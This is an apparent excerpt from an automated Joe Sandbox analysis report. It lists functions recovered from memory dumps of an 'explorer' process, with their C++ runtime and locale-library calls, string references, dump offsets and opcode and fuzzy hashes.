                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        • Opcode ID: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                        • Instruction ID: 4bb12bd4918be3a99648b7eb80e4f719882fbba412893a931bc7d4f136cb85fc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41313A322186C196C711CFA9E85075ABBB2FB99344F58442AEBC983B29DB7CC519CB10
                                                                                                                                                                                                                        Function 0DEFECD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        • Opcode ID: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                        • Instruction ID: c32b4b2b2daac92e58f6fbbabce4b35a7f8e07f6182485f31917de94defdb63e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5313832218781DAC710CFA9E89035ABBB1FB99344F54502AEBCD83A29DB7CC519CF10
                                                                                                                                                                                                                        Function 0DFDCD50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFDCD69
                                                                                                                                                                                                                          • Part of subcall function 0DFFC634: _lock.LIBCMT ref: 0DFFC646
                                                                                                                                                                                                                          • Part of subcall function 0DFDE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0DFDE506
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DFDCDCE
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFDCDFC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFDCE0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                        • Instruction ID: f2449f0cef0237e3cb0de611400a526911d6eff34d5a995152bab11922428bfb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30114671708B8441DE04DB1AE85036AB761FB88BE4F498225DBAD57BA8DF78C545C740
                                                                                                                                                                                                                        Function 0DFDCC80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFDCC99
                                                                                                                                                                                                                          • Part of subcall function 0DFFC634: _lock.LIBCMT ref: 0DFFC646
                                                                                                                                                                                                                          • Part of subcall function 0DFDE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0DFDE506
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DFDCCFE
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFDCD2C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFDCD3D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                        • Instruction ID: f85834757662634cc77f1f18dc9c8ad65c5167de995e42e2883b9d962ea577b9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA118631709B8481DE14DB1AF88036AB361FB88BE4F4982259B9D57BA8DFBCC545C740
                                                                                                                                                                                                                        Function 0DEFCD50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DEFCD69
                                                                                                                                                                                                                          • Part of subcall function 0DF1C634: _lock.LIBCMT ref: 0DF1C646
                                                                                                                                                                                                                          • Part of subcall function 0DEFE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0DEFE506
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DEFCDCE
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DEFCDFC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DEFCE0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                        • Instruction ID: aa0ee5121955dc932de9bf49ddda7cd601bdb8108781b4063780ab4d2a227afb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3116071308B8581DE10EB56E84036EB761F7C8BE4F9992229B5D47BA8DF78C545C740
                                                                                                                                                                                                                        Function 0DEFCC80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DEFCC99
                                                                                                                                                                                                                          • Part of subcall function 0DF1C634: _lock.LIBCMT ref: 0DF1C646
                                                                                                                                                                                                                          • Part of subcall function 0DEFE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0DEFE506
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DEFCCFE
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DEFCD2C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DEFCD3D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                        • Instruction ID: 22701bfab4021d5371c40a53d06a95b5a5a507d169b01ed20ab953027fbd1cd3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B118231308B8581DE10EB5AE88036AB761FBC4BE4F999222DB5D47BA8DF7CC545C740
                                                                                                                                                                                                                        Function 0B0ACD50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0B0ACD69
                                                                                                                                                                                                                          • Part of subcall function 0B0CC634: _lock.LIBCMT ref: 0B0CC646
                                                                                                                                                                                                                          • Part of subcall function 0B0AE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0B0AE506
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0B0ACDCE
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0B0ACDFC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0B0ACE0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                        • Instruction ID: 7aa4031d1873fcb8c46ea9412d2bb53c1bd433cf5df12bb314a1cb647b18afa1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC118271304B8085EE18EB55E8503AEB761F788BE0F884625DAAD47BA8DF78C505C740
                                                                                                                                                                                                                        Function 0B0ACC80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0B0ACC99
                                                                                                                                                                                                                          • Part of subcall function 0B0CC634: _lock.LIBCMT ref: 0B0CC646
                                                                                                                                                                                                                          • Part of subcall function 0B0AE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0B0AE506
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0B0ACCFE
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0B0ACD2C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0B0ACD3D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                        • Instruction ID: 43dc6afdf9599320de3462807211019ee52e71a0d554348b89c3c5f00205756c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33119431704B4485EE18DB55F85039BB761FB88BE4F884621DA6D47BA8DF7CC545C740
                                                                                                                                                                                                                        Function 0DFDD790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFDD7A2
                                                                                                                                                                                                                          • Part of subcall function 0DFFC634: _lock.LIBCMT ref: 0DFFC646
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0DFDD7E8
                                                                                                                                                                                                                          • Part of subcall function 0DFFCE10: setlocale.LIBCMT ref: 0DFFCE24
                                                                                                                                                                                                                          • Part of subcall function 0DFFCE10: _Yarn.LIBCPMT ref: 0DFFCE3E
                                                                                                                                                                                                                          • Part of subcall function 0DFFCE10: setlocale.LIBCMT ref: 0DFFCE4D
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFDD807
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFDD818
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        • Opcode ID: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                        • Instruction ID: 0f95037b7387cf2877b51fb17fbef0d5da66a7f29f9f3527ecd0c29ed35b462f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67F01262358A8450CB54EB29ED901ADB326EBD4B84F8DC1219B4D8B568EF28CDC5C750
                                                                                                                                                                                                                        Function 0DEFD790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DEFD7A2
                                                                                                                                                                                                                          • Part of subcall function 0DF1C634: _lock.LIBCMT ref: 0DF1C646
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0DEFD7E8
                                                                                                                                                                                                                          • Part of subcall function 0DF1CE10: setlocale.LIBCMT ref: 0DF1CE24
                                                                                                                                                                                                                          • Part of subcall function 0DF1CE10: _Yarn.LIBCPMT ref: 0DF1CE3E
                                                                                                                                                                                                                          • Part of subcall function 0DF1CE10: setlocale.LIBCMT ref: 0DF1CE4D
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DEFD807
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DEFD818
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        • Opcode ID: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                        • Instruction ID: f6cfc8d4785eca75bd75ab98d03ddd818a0306ca9b749eb1e75c855289d7a289
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAF0626231898550CB15EF25DC501ACA725EB94B84F85E0218B4E4B568EE28CD89C350
                                                                                                                                                                                                                        Function 0B0AD790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0B0AD7A2
                                                                                                                                                                                                                          • Part of subcall function 0B0CC634: _lock.LIBCMT ref: 0B0CC646
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0B0AD7E8
                                                                                                                                                                                                                          • Part of subcall function 0B0CCE10: setlocale.LIBCMT ref: 0B0CCE24
                                                                                                                                                                                                                          • Part of subcall function 0B0CCE10: _Yarn.LIBCPMT ref: 0B0CCE3E
                                                                                                                                                                                                                          • Part of subcall function 0B0CCE10: setlocale.LIBCMT ref: 0B0CCE4D
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0B0AD807
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0B0AD818
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        • Opcode ID: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                        • Instruction ID: 6064393952bdc5052c86d9aa3f743ac6f7a413926ddd2acacbfbfd7bd3d1223f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86F0626331098499DB18FBA5E9511ED7325FBD4B84FC846718A0E4B9A8EF38C945C340
                                                                                                                                                                                                                        Function 0DFFBD3C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        • Opcode ID: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                        • Instruction ID: cdeeaa051218392e9e5d1190f859897be007f0114778fc2e8c1c2609c2f9eb9c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC319C32614781C6DB208F29E580379BBA5FF84BD4F28C126EB9957B78DB38C4418705
                                                                                                                                                                                                                        Function 0DF1BD3C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        • Opcode ID: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                        • Instruction ID: ce91535f8910ffc85ab2b82e0826f814bc1fae3d38d9c7a11d100d02689b7900
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0131B23A614781C6DB24CF19E580379BBA5FB86FC4F18C126EB8957B68DB38C451C700
                                                                                                                                                                                                                        Function 0B0CBD3C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        • Opcode ID: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                        • Instruction ID: 437cc4c57d03f2689ec3b2a3d11ef1daf49ca9d4b41c1c8a37963505dabb5458
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e13f371260ad2e45ce3e96b535d2fff96f86f4b64d39fc1f6ca56abf7e9bdf8f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9531D432714784CADB688F15E58176FBBA5FB84FD0F18422AEB8A57B68DB38C441C700
                                                                                                                                                                                                                        Function 0DFE9EA0 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
